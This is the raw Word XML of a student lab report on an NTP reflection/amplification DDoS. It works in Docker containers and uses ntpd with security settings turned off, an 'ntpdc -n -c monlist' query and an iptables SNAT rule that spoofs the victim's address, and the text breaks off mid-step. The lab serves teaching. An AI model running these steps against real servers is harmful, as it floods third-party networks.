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5A47" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:afterLines="100" w:after="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200"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北京科技大学实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31661901" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBd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学院：计算机与通信工程学院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>专业：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信息安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>班级：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信安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">192          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA1295" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:beforeLines="100" w:before="312" w:afterLines="100" w:after="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420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霍炟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>学号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">41824147       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验日期：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07A217" w14:textId="6D681305" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200"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实验名称：</w:t>
      </w:r>
      <w:r w:rsidR="00F9271C" w:rsidRPr="00F9271C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>NTP反射攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E21C88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实验目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D4E85" w14:textId="236FAA20" w:rsidR="00A048C5" w:rsidRPr="00302512" w:rsidRDefault="00302512" w:rsidP="00DB21F3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302512">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>学习如何进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00302512">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NTP反射攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A183D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实验仪器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A30A06C" w14:textId="77E0E63B" w:rsidR="00A048C5" w:rsidRPr="00903AFB" w:rsidRDefault="00903AFB" w:rsidP="00A048C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03AFB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>centos6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268714EB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实验原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277230EC" w14:textId="694353AF" w:rsidR="004D1AF5" w:rsidRDefault="004D1AF5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1AF5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NTP放大攻击是一种基于反射的分布式拒绝服务（DDoS）攻击，其中攻击者利用网络时间协议（NTP）服务器功能，以便用一定数量的UDP流量压制目标网络或服务器，使常规流量无法访问目标及其周围的基础设施。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315B7069" w14:textId="59081DF5" w:rsidR="00380EB7" w:rsidRPr="00380EB7" w:rsidRDefault="00380EB7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EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NTP放大攻击可以分为四个步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF44A1B" w14:textId="77777777" w:rsidR="00380EB7" w:rsidRPr="00380EB7" w:rsidRDefault="00380EB7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EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击者将带有欺骗</w:t>
      </w:r>
      <w:r w:rsidRPr="00380EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP地址的UDP数据包发送到启用了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00380EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>monlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00380EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>命令的NTP服务器。每个数据包上的欺骗IP地址指向受害者的真实IP地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CBBF1C" w14:textId="77777777" w:rsidR="00380EB7" w:rsidRPr="00380EB7" w:rsidRDefault="00380EB7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EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00380EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UDP数据包使用其</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00380EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>monlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00380EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>命令向NTP服务器发出请求，从而产生大量响应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746F4BB8" w14:textId="77777777" w:rsidR="00380EB7" w:rsidRPr="00380EB7" w:rsidRDefault="00380EB7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EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>然后，服务器使用结果数据响应欺骗地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239313ED" w14:textId="6CB8B4AC" w:rsidR="00A048C5" w:rsidRPr="00380EB7" w:rsidRDefault="00380EB7" w:rsidP="00380E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EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目标的</w:t>
      </w:r>
      <w:r w:rsidRPr="00380EB7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP地址接收响应，周围的网络基础设施因流量泛滥而变得不堪重负，导致拒绝服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7037E6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lastRenderedPageBreak/>
        <w:t>实验内容与步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597F65EC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1、实验准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0775EA4D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在命令行中载入我们需要用到的镜像：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA3E19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load &lt; ~/images/openvpn_client.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1D32C8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load &lt; ~/images/snortbox.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A31D322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load &lt; ~/images/hadoop_node.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647DAD32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进入工作目录创建docker容器openvpn_client,intro_node2,hadoop_node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446A3C18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run -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>itd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--privileged --name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>openvpn_client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73B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>openvpn_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A9031E5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run -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>itd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--privileged --name intro_node2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>snortbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48D6FB7A" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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run -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>itd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--privileged --name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hadoop_node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73B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hadoop_node</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A7A56A0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在不同终端打开容器并进入容器内部：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425A3A20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 xml:space="preserve">docker attach </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>openvpn_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A74BD29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docker attach intro_node2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B899814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 xml:space="preserve">docker attach </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hadoop_node</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="389BE400" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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openvpn_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为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服务端控制台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F869855" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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intro_node2为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攻击发起控制台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798EE7E4" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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hadoop_node</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为被攻击方 键入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ctrl+p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ctrl+q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>退出容器</w:t>
      </w:r>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>如果出现问题，按照以下步骤删除容器并重新创建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A630F0F" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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停止容器：docker stop &lt;容器名&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4545AEC1" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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lastRenderedPageBreak/>
        <w:t>删除容器：docker rm -v &lt;容器名&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E0924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2、启动NTP服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C17A8D" w14:textId="73361403" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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在NTP服务端控制台，修改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配置文件/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，关闭安全措施 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A875035" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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在NTP服务端控制台，启动NTP服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341CEB0E" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="001E0AB0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 xml:space="preserve">service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntpd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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54723DD8" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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在NTP服务端控制台，启动</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>抓包来验证反射攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBB656E" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="001E0AB0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tcpdump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-v -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i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eth0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>udp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port 123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592EFE42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3、请求NTP服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADD06E2" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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攻击发起控制台，请求NTP服务来校正时间,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>在NTP服务端控制台输入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73B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E154C" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="001E0AB0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ntpdate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>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1063CE91" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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攻击发起控制台，请求获取NTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>monlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FF84EDD" w14:textId="7CAAB950" w:rsidR="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="001E0AB0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ntpdc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-n -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>monlist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>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C942694" w14:textId="0EC1F032" w:rsidR="001E0AB0" w:rsidRPr="00C973B5" w:rsidRDefault="00CF534F" w:rsidP="001E0AB0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r w:rsidRPr="00CF534F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41285FB1" wp14:editId="4BBF21FF">
            <wp:extent cx="5274310" cy="143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B58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4、将NTP服务回应定位到受害机器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8100DC" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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攻击发起控制台，通过iptables设置NTP请求发起的源地址（被攻击方的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>地址）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030AD55D" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs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 xml:space="preserve">iptables -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nat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-I POSTROUTING -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>udp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-j SNAT --to-source </w:t>
      </w:r>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>172.18.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A7F14E" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E110BC" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs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973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
